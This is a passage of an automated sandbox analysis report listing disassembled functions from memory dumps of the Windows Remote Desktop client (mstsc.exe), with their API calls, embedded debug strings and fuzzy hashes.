                                                                                                                                                                                    • Opcode ID: 21f9cc46d32d771945078b567d3cdf65e2848ab59dd9cf667c42aafec191386a
                                                                                                                                                                                    • Instruction ID: 88f66909342500ced18b7fdad94b5d309600f16cfbd221505c2bc4a394ca6168
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21f9cc46d32d771945078b567d3cdf65e2848ab59dd9cf667c42aafec191386a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54317A7261021AAFDB18DFA4D858DBEBB79EF48711B04861CF9068A178CB35E910DB50
                                                                                                                                                                                    Function 00921012 Relevance: 6.1, APIs: 4, Instructions: 106windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00921050
                                                                                                                                                                                    • memset.MSVCRT ref: 0092107C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104B,00000000,?), ref: 009210C3
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 009210D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcmpimemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1640975521-0
                                                                                                                                                                                    • Opcode ID: 18c3c37b885bad9d3ff46ab3ba9d580f9c0bc22dffec9f075e81b858f1eaeddf
                                                                                                                                                                                    • Instruction ID: 194ac49ab2bceb6b0fed9402a14c4011ab739c54082077e1a7037946aaf4ef96
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18c3c37b885bad9d3ff46ab3ba9d580f9c0bc22dffec9f075e81b858f1eaeddf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C41D671A0522C9BCB25DF55DC88BEABBB9EF54700F1041D9E908A3215D6718EE0CF90
                                                                                                                                                                                    Function 00943267 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 95memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00943390: LocalFree.KERNEL32(?,?,00913402,00000001,00901B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0094339C
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,-00000002,00000000,?,?,?,?,00913472,00000000,00000001,00000000,00000000,?,00000000,00000000), ref: 009432DC
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: PTSTR$StringCbCopy failed!$StringCbLength failed!
                                                                                                                                                                                    • API String ID: 139613657-1177650164
                                                                                                                                                                                    • Opcode ID: c9c01df5176ccbf93ef749f6d63a0cf1c5f546fc899b11504dfd8a0ef0242c16
                                                                                                                                                                                    • Instruction ID: f3264808f1707564df83bdabab751eeff11b927b11f2c6e513f19df6563328ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9c01df5176ccbf93ef749f6d63a0cf1c5f546fc899b11504dfd8a0ef0242c16
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59313931A04344AFDB259F79C849F1A7B9AAF45324F44C088F900AB2A2CBB4DE40DB85
                                                                                                                                                                                    Function 00951A27 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951A9A
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951ABE
                                                                                                                                                                                      • Part of subcall function 00951B44: _CIpow.MSVCRT ref: 00951B67
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951AF3
                                                                                                                                                                                      • Part of subcall function 00951B44: _CIpow.MSVCRT ref: 00951B8E
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951B2A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _ftol2_sse$Ipow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3485170201-0
                                                                                                                                                                                    • Opcode ID: 3fbabbb27d7a43244b4e01e8891d8c53af42947e057b9e7b8abb49ca8dd7d24b
                                                                                                                                                                                    • Instruction ID: 5e50ff24417a624794b237153f0e72de8dd5eeb7bee45f9fdef3d633d1f0b184
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fbabbb27d7a43244b4e01e8891d8c53af42947e057b9e7b8abb49ca8dd7d24b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99314331108B46CBC700EF2AE58911ABFE4FF88310F868989E8D886159DB30D538C797
                                                                                                                                                                                    Function 00940849 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0094085C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • StringCchPrintf failed constructing registry string!, xrefs: 009408EA
                                                                                                                                                                                    • %s\%s, xrefs: 009408B4
                                                                                                                                                                                    • RemoteApplications, xrefs: 009408AF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: %s\%s$RemoteApplications$StringCchPrintf failed constructing registry string!
                                                                                                                                                                                    • API String ID: 1171831687-3777318425
                                                                                                                                                                                    • Opcode ID: f0b49e74cdb18aea2b16a94c86c3c03fab4ef0731eec1ed761886ca8a2a492cc
                                                                                                                                                                                    • Instruction ID: 69cc41509a47a7ab1e92905717bb5a9ae07271a1598592dacb285622e964106f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0b49e74cdb18aea2b16a94c86c3c03fab4ef0731eec1ed761886ca8a2a492cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21B43264C3447FE7399B549C05F913A9AAB85324F150088FA486A6F3C6BADC90AF95
                                                                                                                                                                                    Function 009580C1 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 009580D3
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0095818E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to get the file contents as a string!, xrefs: 0095811F
                                                                                                                                                                                    • Failed to set memory stream contents!, xrefs: 00958162
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$??2@AddressHandleLibraryLocalModuleProc
                                                                                                                                                                                    • String ID: Failed to get the file contents as a string!$Failed to set memory stream contents!
                                                                                                                                                                                    • API String ID: 968352646-411829037
                                                                                                                                                                                    • Opcode ID: 8e425816866c6582666653136e2dbe494d0b8c6a04d20253db922515054b6dab
                                                                                                                                                                                    • Instruction ID: 839cc8afef840ef582df3412c5eac3065bfa1232986731824830099736200a02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e425816866c6582666653136e2dbe494d0b8c6a04d20253db922515054b6dab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21E732608314BFCB15DB5AC859FAA7BA5EB85351F080059FD01B71A1CF71CD4AEB81
                                                                                                                                                                                    Function 009513E7 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00943133), ref: 00951428
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003381), ref: 00951435
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00951459
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00951462
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemPlacementWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1803133493-0
                                                                                                                                                                                    • Opcode ID: e4a3832d6e5ae41e4a60b8856916b68aeb998922d167d49cda8e82467a05f665
                                                                                                                                                                                    • Instruction ID: e2691871f75f6e0d7d09a947f204530f977c1b701449f1b1d34a5bbab8b11f4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4a3832d6e5ae41e4a60b8856916b68aeb998922d167d49cda8e82467a05f665
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215C72E0031CABDB00DFA5DC95AAEBBB9FB48310F00412AE904AB250CB706D05CB90
                                                                                                                                                                                    Function 0093A377 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$EnableItem$InsertSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3907634308-0
                                                                                                                                                                                    • Opcode ID: 163f4164c3a9cb0b24a6242cba84d39fb42ad202dc8f37474e0e1cd8028a2b2a
                                                                                                                                                                                    • Instruction ID: 2092cd3a2e49e44cd789989fa1ab7aafc5b13200bc047a7218af1eb34fd9268b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163f4164c3a9cb0b24a6242cba84d39fb42ad202dc8f37474e0e1cd8028a2b2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7111D3317043087FD7249F549C4EF7A7BADAB85710F140069F540AB1E2CBE5DC51AB52
                                                                                                                                                                                    Function 0096706B Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsnicmp$_wcsicmpwcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4194884975-0
                                                                                                                                                                                    • Opcode ID: 56566774b58405b66293b31bd09d30f47e20bc2323e17a30934c502f49b62518
                                                                                                                                                                                    • Instruction ID: 5926bf09eac76302eb7163aa0fba183696ec097d7fd3ca1569df5716fa48fe52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56566774b58405b66293b31bd09d30f47e20bc2323e17a30934c502f49b62518
                                                                                                                                                                                    • Instruction Fuzzy Hash: E611C472209705AB972899E99C95FAFB79CDB80758B98813EFC0AC6140EE71D901C1B0
                                                                                                                                                                                    Function 009518DC Relevance: 6.0, APIs: 4, Instructions: 48timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009518F7
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00951901
                                                                                                                                                                                    • timeGetTime.WINMM ref: 00951936
                                                                                                                                                                                    • timeSetEvent.WINMM(00000021,00000000,00951976,00000000,00000101), ref: 0095194E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Windowtime$EventLongRectTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3825400517-0
                                                                                                                                                                                    • Opcode ID: 8aefbc93b9e0c421eb9ca980722944b6c0c1a093e2e0fb32534c3368b388bcf4
                                                                                                                                                                                    • Instruction ID: 819808691fb34a409ee41c8b2249181e1aa3ac06699d8d630c7eb68ade6665dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aefbc93b9e0c421eb9ca980722944b6c0c1a093e2e0fb32534c3368b388bcf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11A1B2914204DFD720DFA5DC09BAAB7F4EB08311F100A1DF5DA976A0D7B0A804DF14
                                                                                                                                                                                    Function 0095B1E5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0095B20A
                                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
                                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 375572348-0
                                                                                                                                                                                    • Opcode ID: 7ad0872357090a2bb4ccf6c9cddef4067aa1a1edffa73868533d6c4fc83d8f96
                                                                                                                                                                                    • Instruction ID: 0ef39bb5bef2a6547729eafd1939173c7cef46254c62f9f5e235827ee3c7308c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ad0872357090a2bb4ccf6c9cddef4067aa1a1edffa73868533d6c4fc83d8f96
                                                                                                                                                                                    • Instruction Fuzzy Hash: D301A9B1D0522C7BEB309B61AC4AFFB7BBCDB49710F000195F948A71C0DA745F548A90
                                                                                                                                                                                    Function 00943A5B Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00943A80
                                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,?), ref: 00943AB2
                                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,?), ref: 00943ABA
                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00943AC7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 375572348-0
                                                                                                                                                                                    • Opcode ID: 6077fd28a4c842b2cd94e2ef8d02bd677c4ad00960b3f67fb602bef0a839408c
                                                                                                                                                                                    • Instruction ID: ded36194832c41bca5f0e679256a1f4426ad22656cf4f216906fdf29b076f263
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6077fd28a4c842b2cd94e2ef8d02bd677c4ad00960b3f67fb602bef0a839408c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D01A4B190522C7BEB309B61EC4AFEB7BBCDB49710F400199F948671C0DAB55F548B90
                                                                                                                                                                                    Function 0093B991 Relevance: 6.0, APIs: 4, Instructions: 31windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0093B99D
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0093B9AD
                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0093B9C8
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0093B9CF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CompatibleCreateDeleteObjectSelect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3360107340-0
                                                                                                                                                                                    • Opcode ID: 3534d0ebef53875fc9f0614b3abf4f6272c5238ea6c84bf72ea0076272ac0821
                                                                                                                                                                                    • Instruction ID: e7f9e59b2320120e5fdc09084edf9bd90a8cf998f91526ecd24754d1560a9135
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3534d0ebef53875fc9f0614b3abf4f6272c5238ea6c84bf72ea0076272ac0821
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCE06DB2119510BF97121FA6EC0CCBB7F2DEF8A361302002AFA04C1521CB71D861EBE0
                                                                                                                                                                                    Function 02355CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                                                    • String ID: $$0
                                                                                                                                                                                    • API String ID: 1302938615-389342756
                                                                                                                                                                                    • Opcode ID: b83ad79ed53674d0e950980a1bf50607f535df09ef135536422b41b02631d97a
                                                                                                                                                                                    • Instruction ID: e85cfd91a5f3fb98bc9a54f6c74b7abe5bbe9910f2f2b70e58406b9528e08ddf
                                                                                                                                                                                    • Opcode Fuzzy Hash: b83ad79ed53674d0e950980a1bf50607f535df09ef135536422b41b02631d97a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2391C171D043AADFDF24CFA9C484BEDBBB1AF01314F94465ADCAAA7291C3746641CB50
                                                                                                                                                                                    Function 009351D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009351F7
                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?,-0002E684,?,?), ref: 0093526B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileNameOpenmemset
                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                    • API String ID: 158052956-2909332022
                                                                                                                                                                                    • Opcode ID: 7cd5f17462563fdae4c410320869f12ca3aad3a4294766ba4e552d106a39b96d
                                                                                                                                                                                    • Instruction ID: 509f439c1d8556fe11f297e75a5410f8aaf7e601208c2111394bc8f2d0994248
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cd5f17462563fdae4c410320869f12ca3aad3a4294766ba4e552d106a39b96d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 975170B1A043189FCB28DF14DC88FAA77F9AF89300F0504E9E509AB291DA75DE85CF51
                                                                                                                                                                                    Function 00965304 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
                                                                                                                                                                                    • ShellMessageBoxW.SHLWAPI ref: 009654B4
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$ActivityControlEventShellTrace_vsnwprintf
                                                                                                                                                                                    • String ID: %s%s$StringCchPrintf failed!
                                                                                                                                                                                    • API String ID: 2994778881-397920807
                                                                                                                                                                                    • Opcode ID: 60820335bec01a4a09614bf095844e4963ba5c70162a0e85b21ad75f45b220e7
                                                                                                                                                                                    • Instruction ID: 1631499d399c822fa4db7bc1191019574d65c70583657c8bef39bbe71727bdda
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60820335bec01a4a09614bf095844e4963ba5c70162a0e85b21ad75f45b220e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41F5316053486FD716DE54CC09FAA37AEAB49300F0600D9F645E71B2CAB5CDC09B52
                                                                                                                                                                                    Function 0091B974 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsZoomed.USER32(?), ref: 0091B987
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTraceZoomed
                                                                                                                                                                                    • String ID: SyncSessionDisplaySettings failed!$put_FullScreen failed!
                                                                                                                                                                                    • API String ID: 3071394470-3388693860
